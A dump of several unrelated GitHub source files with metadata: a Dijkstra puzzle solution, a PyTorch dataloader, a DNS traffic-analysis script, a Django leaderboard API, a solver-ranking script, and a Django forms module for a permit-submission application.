녹색 옷 입은 애가 젤다지?\n\nimport sys\nimport heapq\n\ntest_case = 0\nDELTA = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n\nwhile True:\n test_case += 1\n N = int(sys.stdin.readline())\n if N == 0:\n break\n \n map_ = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n cost = [[int(1e9)] * N for _ in range(N)]\n\n q = []\n heapq.heappush(q, (map_[0][0], 0, 0))\n \n while q:\n cur_cost, y, x = heapq.heappop(q)\n \n if y == N-1 and x == N-1:\n answer = cur_cost\n break\n \n for dy, dx in DELTA:\n ny, nx = y + dy, x + dx\n if not (0 <= ny < N and 0 <= nx < N):\n continue\n new_cost = map_[ny][nx] + cur_cost\n if cost[ny][nx] > new_cost:\n cost[ny][nx] = new_cost\n heapq.heappush(q, (new_cost, ny, nx))\n\n print(f'Problem {test_case}: {answer}')","repo_name":"KDT2-Algorithm-study/Algorithm-study","sub_path":"백준/4485/4485_김창조.py","file_name":"4485_김창조.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"9637740806","text":"import os\nimport torch\nimport torchvision.datasets as dset \nimport dataloaders.data_utils as utils\n\ndef define_dataloader(dataset='CIFAR10', data='data', batch_size=64):\n if dataset == 'CIFAR10':\n train_transform, valid_transform = utils._data_transforms_cifar10()\n train_data = dset.CIFAR10(root=data, train=True, download=True, transform=train_transform)\n valid_data = dset.CIFAR10(root=data, train=False, download=True, transform=valid_transform)\n elif dataset == 'CIFAR100':\n train_transform, valid_transform = utils._data_transforms_cifar100()\n train_data = dset.CIFAR100(root=data, train=True, download=True, transform=train_transform)\n valid_data = dset.CIFAR100(root=data, train=False, download=True, transform=valid_transform)\n elif dataset == 'SVHN':\n train_transform, valid_transform = utils._data_transforms_svhn()\n train_data = dset.SVHN(root=data, split='train', download=True, transform=train_transform)\n valid_data = dset.SVHN(root=data, split='test', download=True, transform=valid_transform)\n elif dataset == 'imagenet16-120':\n import torchvision.transforms as transforms\n from .DownsampledImageNet import ImageNet16\n mean = [x / 255 for x in [122.68, 116.66, 104.01]]\n std = [x / 255 for x in [63.22, 61.26, 65.09]]\n lists = [transforms.RandomHorizontalFlip(), transforms.RandomCrop(16, padding=2), transforms.ToTensor(), transforms.Normalize(mean, std)]\n train_transform = transforms.Compose(lists)\n train_data = ImageNet16(root=os.path.join(data,'imagenet16'), train=True, transform=train_transform, use_num_of_class_only=120)\n valid_data = ImageNet16(root=os.path.join(data,'imagenet16'), train=False, transform=train_transform, use_num_of_class_only=120)\n assert len(train_data) == 151700\n\n return torch.utils.data.DataLoader(train_data, batch_size=batch_size, shuffle=True, pin_memory=True, num_workers=4)\n\n","repo_name":"Tiaspetto/zero_cost_perf","sub_path":"dataloaders/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"5207090225","text":"\"\"\"\n\" Analysis the inner server of weird DNS traffic based on the Weird Record\n\" The inner server means the inner Campus DNS server which involved in the weird behavior.\n\" Input: the target filename\n\" Output: the topK collected result from target file\n\" By Zhengping on 2019-01-08\n\"\"\"\n\nimport sys\nfrom collections import Counter\nimport 
json\nsys.path.append('/home/zhengping/DNS/DNSPythonWorkspace')\nfrom src.util.IPCluster import getIPCluster\n\ndef doCollectTask(filename, topK):\n \"\"\"\n Collect the topK result from filename\n :param filename: target filename\n :param topK: topK wants to select, by default is None.\n :return: top K count result.\n \"\"\"\n f = open(filename)\n dataDict = json.load(f)\n weirdInCollect = Counter()\n for key in dataDict:\n if dataDict[key][\"weird\"]:\n # Check direction first to get the inner server.\n srcIP = dataDict[key][\"addr\"][0]\n dstIP = dataDict[key][\"addr\"][2]\n for _ in dataDict[key][\"weird\"]:\n if srcIP.startswith(\"136.159.\"):\n # Which means srcIP is within our campus. it should be an outbound traffic\n weirdInCollect[getIPCluster(srcIP)] += 1\n else:\n weirdInCollect[getIPCluster(dstIP)] += 1\n\n return Counter(dict(weirdInCollect.most_common(topK)))\n","repo_name":"aquablue1/dns_comb","sub_path":"src/integUtil/worker2D1WeirdInG.py","file_name":"worker2D1WeirdInG.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40257989284","text":"from django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_page\nfrom django_filters import rest_framework\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.mixins import ListModelMixin, RetrieveModelMixin\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom common.api.serializers import LeaderBoardSerializer\nfrom common.models import LeaderBoard\n\n\nclass LeaderBoardFilterBackend(rest_framework.DjangoFilterBackend):\n allowed_lookups = [\n 'rate_place',\n 'rate_place__gt',\n 'rate_place__gte',\n 'rate_place__lt',\n 'rate_place__lte',\n 'user_id',\n ]\n\n def filter_queryset(self, request, queryset, view):\n filter_args = request.query_params\n allowed_filter_args = {allowed_key: filter_args[allowed_key] for allowed_key in self.allowed_lookups if\n allowed_key in filter_args.keys()}\n return queryset.filter(**allowed_filter_args)\n\n\nclass LeaderBoardViewSet(ListModelMixin, RetrieveModelMixin, GenericViewSet):\n serializer_class = LeaderBoardSerializer\n queryset = LeaderBoard.objects.order_by('-rating', 'datetime')\n filter_backends = (LeaderBoardFilterBackend,)\n\n @method_decorator(cache_page(60)) # 1 min\n def retrieve(self, request, *args, **kwargs):\n rate_place = kwargs.get('pk')\n if not rate_place:\n raise NotFound\n try:\n rate_place = int(rate_place)\n except:\n raise NotFound\n qs_params = {\n 'rate_place__gte': rate_place - 1,\n 'rate_place__lte': rate_place + 1\n }\n self.queryset = self.queryset.filter(**qs_params)\n return self.list(request, *args, **kwargs)\n\n @method_decorator(cache_page(60)) # 1 min\n def list(self, request, *args, **kwargs):\n return super(LeaderBoardViewSet, self).list(request, *args, **kwargs)\n","repo_name":"xtimonx5/rating_test","sub_path":"rating/common/api/viewsets/rate_record.py","file_name":"rate_record.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17899822779","text":"from rank import rank \n\nrankings = {}\nm = {0: {}, -1: {}}\nscore = {}\n\nlargura = 0\n\nfor inst in set(rank):\n\tfor col in set(rank[inst]):\n\t\tfor tl in set(rank[inst][col]):\n\t\t\t\n\t\t\tif not len(rank[inst][col][tl]):\n\t\t\t\tcontinue \n\t\t\tr = n = []\n\t\t\tk = None\n\t\t\trank[inst][col][tl].sort()\n\t\t\tfor d, sol in 
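The DNS collector above combines a direction test on the campus prefix with Counter.most_common. A self-contained sketch of that pattern; ip_cluster here is a hypothetical /24 stand-in for the project's getIPCluster:

from collections import Counter

def ip_cluster(ip):
    # Hypothetical /24 clustering; the real script uses getIPCluster instead.
    return ".".join(ip.split(".")[:3]) + ".0/24"

events = [
    ("136.159.1.5", "8.8.8.8"),   # outbound: the inner endpoint is the source
    ("136.159.1.9", "1.1.1.1"),
    ("9.9.9.9", "136.159.2.7"),   # inbound: the inner endpoint is the destination
]
weird_in_collect = Counter()
for src, dst in events:
    inner = src if src.startswith("136.159.") else dst
    weird_in_collect[ip_cluster(inner)] += 1

print(Counter(dict(weird_in_collect.most_common(2))))
# Counter({'136.159.1.0/24': 2, '136.159.2.0/24': 1})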
rank[inst][col][tl]:\n\t\t\t\tif d == k:\n\t\t\t\t\tn.append(sol)\n\t\t\t\telse:\t\n\t\t\t\t\tn = [sol]\n\t\t\t\t\tr.append(n)\n\t\t\t\tk = d\t\n\t\t\tfor n in r:\n\t\t\t\tn.sort()\t\n\t\t\tr = tuple(tuple(n) for n in r)\t\n\t\t\tif not r in rankings:\n\t\t\t\tprint(col, tl, inst, '\\t', *r)\n\t\t\t\trankings[r] = {}\n\t\t\trankings[r][col, tl, inst] = rank[inst][col][tl]\n\nfor r in rankings:\t\t\t\n\tprint('\\n', *r)\n\trk = list(rankings[r])\n\trk.sort()\n\tfor k in rk:\n\t\tprint(*k, sep='\\t')\t\n\t\t\n\tfor i in m:\t\n\t\tif len(r) != 1:\t\n\t\t\tfor s in r[i]:\n\t\t\t\tif not s in m[i]:\n\t\t\t\t\tm[i][s] = {}\n\t\t\t\tm[i][s].update({(k[-1].split('.')[-1],) + k + ((len(r[i]),) * ((len(r[i]) > 1))): rankings[r][k] for k in rankings[r]})\t\t\t\t\t\n\nfor i in m:\n\tprint('\\n\\n',i)\n\tfor sol in m[i]:\n\t\tif not sol in score:\n\t\t\tscore[sol] = {}\n\t\tscore[sol][i] = {}\n\n\t\tfor k in m[i][sol]:\n\t\t\tl = len(str(k)) + len(k)\n\t\t\tif l > largura:\n\t\t\t\tlargura = l\n\t\tprint('\\n\\t',sol)\n\t\trk = list(m[i][sol])\n\t\trk.sort()\n\t\tfor k in rk:\n\t\t\tprint(*k, ' '*(largura - len(str(k))), '\\t', m[i][sol][k])\t\n\t\t\tif not k[:2] in score[sol][i]:\n\t\t\t\tscore[sol][i][k[:2]] = {}\n\t\t\tscore[sol][i][k[:2]][k[2:]] = m[i][sol][k] \t\n\t\t\t\nfor sol in score:\n\tfor i in score[sol]:\n\t\tprint()\n\t\tprint(i,'\\t',sol)\n\t\tcolunas = list(score[sol][i])\n\t\tcolunas.sort()\n\t\tfor col in colunas:\n\t\t\tcategorias = {}\n\t\t\tprint(*col,'\\t',len(score[sol][i][col]))\n\t\t\tfor k in score[sol][i][col]:\n\t\t\t\tfor c in range(len(k)):\n\t\t\t\t\tt = k[c]\n\t\t\t\t\twhile type(t) == tuple and len(t) > 0:\n\t\t\t\t\t\tt = t[0]\t\n\t\t\t\t\tif not (c, t) in categorias:\n\t\t\t\t\t\tcategorias[c, t] = 0\n\t\t\t\t\tcategorias[c, t] += 1\n\t\t\tcat = list(categorias)\t\t\n\t\t\tcat.sort()\n\t\t\tfor c, k in cat:\t\t\t\n\t\t\t\tprint(' ',k,'\\t', categorias[c, k])\n\t\t\t\tpass \n","repo_name":"AkiraDemenech/MIP_Solvers","sub_path":"cflp.rank.py","file_name":"cflp.rank.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20588905650","text":"import io\nimport mimetypes\nimport string\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom itertools import groupby\n\nfrom bootstrap_datepicker_plus.widgets import DatePickerInput, DateTimePickerInput\nfrom captcha.fields import CaptchaField\nfrom constance import config\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import HTML, Field, Fieldset, Layout\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.gis import forms as geoforms\nfrom django.core.exceptions import ValidationError\nfrom django.core.files import File\nfrom django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator\nfrom django.db import transaction\nfrom django.db.models import Max, Q\nfrom django.forms import modelformset_factory\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.utils.text import slugify\nfrom django.utils.translation import gettext_lazy as _\nfrom django_select2.forms import Select2MultipleWidget, Select2Widget\n\nfrom geocity.apps.accounts.models import (\n PUBLIC_TYPE_CHOICES,\n AdministrativeEntity,\n PermitDepartment,\n)\nfrom geocity.fields import 
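The tie-grouping loop in the ranking script above (equal distances collapse into one group, each group sorted internally) can be cross-checked against itertools.groupby, which performs the same grouping on pre-sorted input:

from itertools import groupby

pairs = sorted([(10, "b"), (10, "a"), (12, "c")])  # (distance, solver) pairs
ranking = tuple(
    tuple(sorted(sol for _, sol in grp))
    for _, grp in groupby(pairs, key=lambda p: p[0])
)
assert ranking == (("a", "b"), ("c",))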
AddressWidget, GeometryWidgetAdvanced\n\nfrom ..forms.models import Price\nfrom ..reports.services import generate_report_pdf_as_response\nfrom . import models, permissions, services\nfrom .payments.models import SubmissionPrice\n\ninput_type_mapping = {\n models.Field.INPUT_TYPE_TEXT: forms.CharField,\n models.Field.INPUT_TYPE_CHECKBOX: forms.BooleanField,\n models.Field.INPUT_TYPE_NUMBER: forms.FloatField,\n models.Field.INPUT_TYPE_FILE: forms.FileField,\n models.Field.INPUT_TYPE_ADDRESS: forms.CharField,\n models.Field.INPUT_TYPE_DATE: forms.DateField,\n models.Field.INPUT_TYPE_LIST_SINGLE: forms.ChoiceField,\n models.Field.INPUT_TYPE_LIST_MULTIPLE: forms.MultipleChoiceField,\n models.Field.INPUT_TYPE_REGEX: forms.CharField,\n}\n\n\ndef get_regex_error_message(field):\n return (\n (\n _(\"La saisie n'est pas conforme au format demandé (%(placeholder)s).\")\n % {\"placeholder\": field.placeholder}\n )\n if field.placeholder\n else _(\"La saisie n'est pas conforme au format demandé.\")\n )\n\n\ndef _title_html_representation(prop, for_summary=False):\n base = f\"
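A minimal sketch of the dispatch-table idiom that input_type_mapping above relies on: the input-type key selects a form-field class, and an unknown key fails with an explicit message. The three field types listed here are just illustrative:

from django import forms

FIELD_CLASSES = {
    "text": forms.CharField,
    "number": forms.FloatField,
    "date": forms.DateField,
}

def field_for(input_type, **kwargs):
    try:
        return FIELD_CLASSES[input_type](**kwargs)
    except KeyError as e:
        raise KeyError(f"Field of type {e} is not supported.")

assert isinstance(field_for("number", required=False), forms.FloatField)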
{prop.name}
\"\n if not for_summary and prop.help_text:\n base = f\"{base}{prop.help_text}\"\n return base\n\n\ndef _text_html_representation(prop, for_summary=False):\n base = f\"

{prop.name}

\"\n if not for_summary and prop.help_text:\n base = f\"{base}{prop.help_text}\"\n return base\n\n\ndef _file_download_html_representation(prop, for_summary=False):\n if not for_summary and prop.file_download:\n description = prop.help_text if prop.help_text else _(\"Télécharger le fichier\")\n return f\"\"\"{prop.name}:\n \n {description}\"\"\"\n return \"\"\n\n\nnon_value_input_type_mapping = {\n models.Field.DISPLAY_TITLE: _title_html_representation,\n models.Field.DISPLAY_TEXT: _text_html_representation,\n models.Field.INPUT_TYPE_FILE_DOWNLOAD: _file_download_html_representation,\n}\n\n\ndef get_field_cls_for_field(field):\n try:\n return input_type_mapping[field.input_type]\n except KeyError as e:\n raise KeyError(f\"Field of type {e} is not supported.\")\n\n\ndef regroup_by_ofs_id(entities):\n return groupby(entities.order_by(\"ofs_id\", \"name\"), lambda entity: entity.ofs_id)\n\n\ndef disable_form(form, editable_fields=None):\n for field in form.fields.values():\n if editable_fields and field.label in editable_fields:\n continue\n field.disabled = True\n\n if not editable_fields:\n form.disabled = True\n\n\nclass DisabledChoicesMixin:\n @property\n def disabled_choices(self):\n return getattr(self, \"_disabled_choices\", [])\n\n @disabled_choices.setter\n def disabled_choices(self, other):\n self._disabled_choices = other\n\n def create_option(\n self, name, value, label, selected, index, subindex=None, attrs=None\n ):\n option = super().create_option(\n name, value, label, selected, index, subindex, attrs\n )\n if value in self.disabled_choices:\n option[\"attrs\"][\"disabled\"] = \"disabled\"\n return option\n\n\nclass GroupedRadioWidget(forms.RadioSelect):\n template_name = \"submissions/widgets/groupedradio.html\"\n\n class Media:\n css = {\"all\": (\"customWidgets/GroupedRadio/groupedradio.css\",)}\n\n\nclass CheckboxSelectMultipleWidget(DisabledChoicesMixin, forms.CheckboxSelectMultiple):\n template_name = \"submissions/widgets/multipleselect.html\"\n option_template_name = \"submissions/widgets/checkbox_option.html\"\n\n\nclass SingleFormRadioSelectWidget(DisabledChoicesMixin, forms.RadioSelect):\n template_name = \"submissions/widgets/categorized_groupedradio.html\"\n\n\nclass AdministrativeEntityForm(forms.Form):\n administrative_entity = forms.ModelChoiceField(\n label=_(\"Entité administrative\"),\n widget=GroupedRadioWidget(),\n queryset=AdministrativeEntity.objects.all(),\n )\n\n def __init__(self, *args, **kwargs):\n self.instance = kwargs.pop(\"instance\", None)\n self.user = kwargs.pop(\"user\", None)\n administrative_entities = kwargs.pop(\"administrative_entities\")\n\n if self.instance:\n initial = {\n **kwargs.get(\"initial\", {}),\n \"administrative_entity\": self.instance.administrative_entity.pk,\n }\n else:\n initial = {}\n\n kwargs[\"initial\"] = initial\n\n super().__init__(*args, **kwargs)\n\n self.fields[\"administrative_entity\"].choices = [\n (ofs_id, [(entity.pk, entity.name) for entity in entities])\n for ofs_id, entities in regroup_by_ofs_id(administrative_entities)\n ]\n\n def save(self, author):\n administrative_entity_instance = AdministrativeEntity.objects.get(\n pk=self.cleaned_data[\"administrative_entity\"].pk\n )\n\n if not self.instance:\n return models.Submission.objects.create(\n administrative_entity=administrative_entity_instance,\n author=author,\n )\n else:\n self.instance.set_administrative_entity(administrative_entity_instance)\n return self.instance\n\n\nclass FormChoiceField(forms.ModelMultipleChoiceField):\n def 
label_from_instance(self, obj):\n return obj.name\n\n\nclass FormsSelectForm(forms.Form):\n prefix = \"forms\"\n selected_forms = forms.MultipleChoiceField(widget=CheckboxSelectMultipleWidget())\n\n def __init__(self, instance, form_categories=None, *args, **kwargs):\n self.instance = instance\n self.user = kwargs.pop(\"user\", None)\n form_categories = form_categories or []\n selected_forms = list(\n self.instance.selected_forms.values_list(\"form_id\", flat=True)\n )\n\n initial = {\"selected_forms\": selected_forms}\n\n super().__init__(*args, **{**kwargs, \"initial\": initial})\n user_can_view_private_form = self.user.has_perm(\"submissions.view_private_form\")\n\n forms_filter = Q()\n\n if form_categories:\n forms_filter &= Q(category__in=form_categories)\n\n integrator_admin = self.user.groups.filter(\n permit_department__is_integrator_admin=True\n ).first()\n\n user_administrative_entities = AdministrativeEntity.objects.associated_to_user(\n self.user\n )\n\n if not self.user.is_superuser:\n if integrator_admin:\n \"\"\"An integrator can fill all forms he owns + public ones\"\"\"\n forms_filter &= Q(integrator=integrator_admin) | Q(is_public=True)\n elif user_administrative_entities and user_can_view_private_form:\n \"\"\"User is trusted and associated to administrative entities,\n he can fill private forms for those administrative entities\n if granted permission 'view_private_form'\"\"\"\n forms_filter &= Q(\n administrative_entities__in=user_administrative_entities\n ) | Q(is_public=True)\n elif not user_can_view_private_form or not user_administrative_entities:\n \"\"\"Untrusted users or user not granted with view_private_form can only fill public forms\"\"\"\n forms_filter &= Q(is_public=True)\n\n forms = (\n models.Form.objects.filter(\n Q(\n forms_filter,\n administrative_entities=self.instance.administrative_entity,\n is_anonymous=self.user.userprofile.is_temporary,\n )\n | Q(pk__in=selected_forms)\n )\n .distinct()\n .select_related(\"category\")\n .order_by(\"order\")\n )\n\n forms_by_category_dict = {}\n for form in forms:\n forms_by_category_dict.setdefault(form.category, []).append(form)\n\n forms_by_category = []\n disabled_choices = set()\n for category, forms in sorted(\n forms_by_category_dict.items(), key=lambda item: slugify(item[0].name)\n ):\n forms_list = []\n for form in forms:\n form_name = form.name\n if form.has_exceeded_maximum_submissions():\n form_name = f\"{form_name} {form.max_submissions_message}\"\n disabled_choices.add(form.pk)\n forms_list.append((form.pk, form_name))\n\n forms_by_category.append((category, forms_list))\n\n self.fields[\"selected_forms\"].choices = forms_by_category\n self.fields[\"selected_forms\"].widget.disabled_choices = disabled_choices\n self.initial[\"selected_forms\"] = [\n e for e in self.initial[\"selected_forms\"] if e not in disabled_choices\n ]\n\n def clean_selected_forms(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n if any([form.has_exceeded_maximum_submissions() for form in selected_forms]):\n raise forms.ValidationError(selected_forms.first().max_submissions_message)\n return self.cleaned_data[\"selected_forms\"]\n\n @transaction.atomic\n def save(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n self.instance.set_selected_forms(selected_forms)\n\n return self.instance\n\n @transaction.atomic\n def save(self):\n selected_forms = models.Form.objects.filter(\n 
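The visibility filter built in FormsSelectForm.__init__ above composes Q objects per role. A sketch of that branching as a pure function; the arguments are hypothetical stand-ins for the group and queryset objects the real form uses:

from django.db.models import Q

def visibility_filter(integrator_group, user_entities, can_view_private):
    # Start permissive, then AND in constraints depending on the user's role.
    flt = Q()
    if integrator_group is not None:
        flt &= Q(integrator=integrator_group) | Q(is_public=True)
    elif user_entities and can_view_private:
        flt &= Q(administrative_entities__in=user_entities) | Q(is_public=True)
    else:
        flt &= Q(is_public=True)
    return flt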
pk__in=self.cleaned_data[\"selected_forms\"]\n )\n self.instance.set_selected_forms(selected_forms)\n\n return self.instance\n\n @transaction.atomic\n def save(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n self.instance.set_selected_forms(selected_forms)\n\n return self.instance\n\n\nclass FormsSingleSelectForm(FormsSelectForm):\n selected_forms = forms.ChoiceField(widget=SingleFormRadioSelectWidget())\n\n def clean_selected_forms(self):\n selected_form = models.Form.objects.get(pk=self.cleaned_data[\"selected_forms\"])\n if selected_form.has_exceeded_maximum_submissions():\n raise forms.ValidationError(selected_form.max_submissions_message)\n return self.cleaned_data[\"selected_forms\"]\n\n @transaction.atomic\n def save(self):\n selected_form = models.Form.objects.get(pk=self.cleaned_data[\"selected_forms\"])\n self.instance.set_selected_forms([selected_form])\n return self.instance\n\n\nclass FormsPriceSelectForm(forms.Form):\n\n selected_price = forms.ChoiceField(\n label=False, widget=SingleFormRadioSelectWidget(), required=True\n )\n\n def __init__(self, instance, *args, **kwargs):\n self.instance = instance\n initial = {}\n if self.instance.submission_price is not None:\n initial = {\n \"selected_price\": self.instance.submission_price.original_price.pk\n }\n super(FormsPriceSelectForm, self).__init__(\n *args, **{**kwargs, \"initial\": initial}\n )\n if self.instance.status != self.instance.STATUS_DRAFT:\n self.fields[\"selected_price\"].widget.attrs[\"disabled\"] = \"disabled\"\n form_for_payment = self.instance.get_form_for_payment()\n\n choices = []\n for price in form_for_payment.prices.order_by(\"formprice\"):\n choices.append((price.pk, price.str_for_choice()))\n self.fields[\"selected_price\"].choices = choices\n\n @transaction.atomic\n def save(self):\n selected_price_id = self.cleaned_data[\"selected_price\"]\n selected_price = Price.objects.get(pk=selected_price_id)\n price_data = {\n \"amount\": selected_price.amount,\n \"currency\": selected_price.currency,\n \"text\": selected_price.text,\n }\n current_submission_price = self.instance.get_submission_price()\n if current_submission_price is None:\n SubmissionPrice.objects.create(\n **{\n **price_data,\n \"original_price\": selected_price,\n \"submission\": self.instance,\n }\n )\n else:\n current_submission_price.amount = price_data[\"amount\"]\n current_submission_price.text = price_data[\"text\"]\n current_submission_price.currency = price_data[\"currency\"]\n current_submission_price.original_price = selected_price\n current_submission_price.save()\n\n return self.instance\n\n\nclass PartialValidationMixin:\n def __init__(self, *args, **kwargs):\n # Set to `False` to disable required fields validation (useful to allow saving incomplete forms)\n self.enable_required = kwargs.pop(\"enable_required\", True)\n super().__init__(*args, **kwargs)\n\n\nclass FieldsForm(PartialValidationMixin, forms.Form):\n prefix = \"fields\"\n required_css_class = \"required\"\n\n def __init__(self, instance, *args, **kwargs):\n self.instance = instance\n disable_fields = kwargs.pop(\"disable_fields\", False)\n\n # Compute initial values for fields\n initial = {}\n prop_values = self.get_values()\n for prop_value in prop_values:\n initial[\n self.get_field_name(\n prop_value.selected_form.form,\n prop_value.field,\n )\n ] = prop_value.get_value()\n\n kwargs[\"initial\"] = {**initial, **kwargs.get(\"initial\", {})}\n\n super().__init__(*args, **kwargs)\n\n fields_per_form = 
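FormsPriceSelectForm.save() above branches on whether a SubmissionPrice already exists. If the model keeps one price row per submission (which get_submission_price() suggests, though the excerpt does not prove it), Django's update_or_create can express the same logic in one call; a hedged sketch:

def sync_submission_price(submission, selected_price):
    # SubmissionPrice is the model imported at the top of this module.
    from .payments.models import SubmissionPrice

    price, _created = SubmissionPrice.objects.update_or_create(
        submission=submission,
        defaults={
            "amount": selected_price.amount,
            "currency": selected_price.currency,
            "text": selected_price.text,
            "original_price": selected_price,
        },
    )
    return price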
defaultdict(list)\n payment_forms = set()\n\n # Create fields\n for form, field in self.get_fields():\n field_name = self.get_field_name(form, field)\n form_name = form.shortname if form.shortname else str(form)\n if form.requires_online_payment:\n payment_forms.add(form_name)\n if field.is_value_field():\n fields_per_form[form_name].append(\n Field(field_name, title=field.help_text)\n )\n self.fields[field_name] = self.form_field_for_field(field)\n if field.is_mandatory:\n self.fields[field_name].required = True\n else:\n fields_per_form[form_name].append(self.non_field_value_for_field(field))\n\n if disable_fields:\n for field in self.fields.values():\n field.disabled = True\n\n fieldsets = []\n for form_str, fieldset_fields in fields_per_form.items():\n if form_str in payment_forms:\n form_str = \"\"\n fieldset_fields = [form_str] + fieldset_fields\n fieldsets.append(Fieldset(*fieldset_fields))\n\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(*fieldsets)\n\n def get_field_representation(self, form, field):\n if field.is_value_field():\n return self[self.get_field_name(form, field)]\n else:\n return {\n \"repr\": non_value_input_type_mapping.get(field.input_type, {})(\n field, True\n )\n }\n\n def get_form_fields_by_form(self):\n \"\"\"\n Return a list of tuples `(Form, List[Field])` for each object type and their properties.\n \"\"\"\n\n return [\n (\n object_type,\n [self.get_field_representation(object_type, prop) for prop in props],\n )\n for object_type, props in self.get_fields_by_form()\n ]\n\n def get_fields_by_form(self):\n \"\"\"\n Return a list of tuples `(Form, List[Field])` for the forms selected in the\n current submission.\n \"\"\"\n return self.instance.get_fields_by_form()\n\n def get_fields(self):\n \"\"\"\n Return a list of tuples `(Form, Field)` for the current submission. They're\n used to create the form fields.\n \"\"\"\n for form, fields in self.instance.get_fields_by_form():\n for field in fields:\n yield (form, field)\n\n def get_values(self):\n \"\"\"\n Return `FieldValue` objects for the current submission. They're used to set the initial\n value of the form fields.\n \"\"\"\n return self.instance.get_fields_values()\n\n def get_field_name(self, form, field):\n return \"{}_{}\".format(form.pk, field.pk)\n\n def form_field_for_field(self, field):\n \"\"\"\n Return a Field instance for the given property. The specific class of the field is defined by\n `get_field_cls_for_field`.\n \"\"\"\n field_class = get_field_cls_for_field(field)\n field_instance = field_class(**self.get_field_kwargs(field))\n\n return field_instance\n\n def non_field_value_for_field(self, field):\n try:\n input_func = non_value_input_type_mapping[field.input_type]\n return HTML(f\"
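FieldsForm above attaches its fields dynamically at __init__ time rather than declaring them on the class. A minimal sketch of that pattern, keeping the "<form_pk>_<field_pk>" naming scheme used by get_field_name:

from django import forms

class DynamicFieldsSketch(forms.Form):
    def __init__(self, specs, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # specs is a list of (form_pk, field_pk, label, required) tuples;
        # each spec becomes one entry in self.fields, so rendering and
        # validation pick it up like any declared field.
        for form_pk, field_pk, label, required in specs:
            self.fields[f"{form_pk}_{field_pk}"] = forms.CharField(
                label=label, required=required
            )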
{input_func(field)}
\")\n except KeyError as e:\n raise KeyError(f\"Field of type {e} is not supported.\")\n\n def get_field_kwargs(self, prop):\n \"\"\"\n Return the options used when instantiating the field for the given `prop`.\n \"\"\"\n default_kwargs = {\n \"required\": self.enable_required and prop.is_mandatory,\n \"label\": prop.name,\n \"help_text\": prop.help_text if prop.help_text != \"\" else \"\",\n }\n\n extra_kwargs = {\n models.Field.INPUT_TYPE_TEXT: self.get_text_field_kwargs,\n models.Field.INPUT_TYPE_ADDRESS: self.get_address_field_kwargs,\n models.Field.INPUT_TYPE_DATE: self.get_date_field_kwargs,\n models.Field.INPUT_TYPE_NUMBER: self.get_number_field_kwargs,\n models.Field.INPUT_TYPE_FILE: self.get_file_field_kwargs,\n models.Field.INPUT_TYPE_REGEX: self.get_regex_field_kwargs,\n models.Field.INPUT_TYPE_LIST_SINGLE: self.get_list_single_field_kwargs,\n models.Field.INPUT_TYPE_LIST_MULTIPLE: self.get_list_multiple_field_kwargs,\n }\n\n try:\n return extra_kwargs[prop.input_type](prop, default_kwargs)\n except KeyError:\n return default_kwargs\n\n def get_text_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"widget\": forms.Textarea(\n attrs={\n \"rows\": field.line_number_for_textarea,\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\",\n },\n ),\n }\n\n def get_regex_field_kwargs(self, field, default_kwargs):\n\n return {\n **default_kwargs,\n \"widget\": forms.Textarea(\n attrs={\n \"rows\": 1,\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\",\n },\n ),\n \"validators\": [\n RegexValidator(\n regex=field.regex_pattern,\n message=get_regex_error_message(field),\n )\n ],\n }\n\n def get_address_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"widget\": AddressWidget(\n autocomplete_options={\n \"single_address_field\": True,\n },\n attrs={\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\",\n \"additional_searchtext_for_address_field\": field.additional_searchtext_for_address_field\n if field.additional_searchtext_for_address_field\n else \"\",\n },\n ),\n }\n\n def get_date_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"input_formats\": [settings.DATE_INPUT_FORMAT],\n \"widget\": DatePickerInput(\n options={\n \"format\": \"DD.MM.YYYY\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n \"minDate\": \"1900/01/01\",\n \"maxDate\": \"2100/12/31\",\n },\n attrs={\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\"\n },\n ),\n }\n\n def get_number_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"widget\": forms.NumberInput(\n attrs={\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\"\n },\n ),\n }\n\n def get_file_field_kwargs(self, field, default_kwargs):\n file_size_mb = int(config.MAX_FILE_UPLOAD_SIZE / 1048576)\n default_help_text = f\"Le fichier doit faire moins de 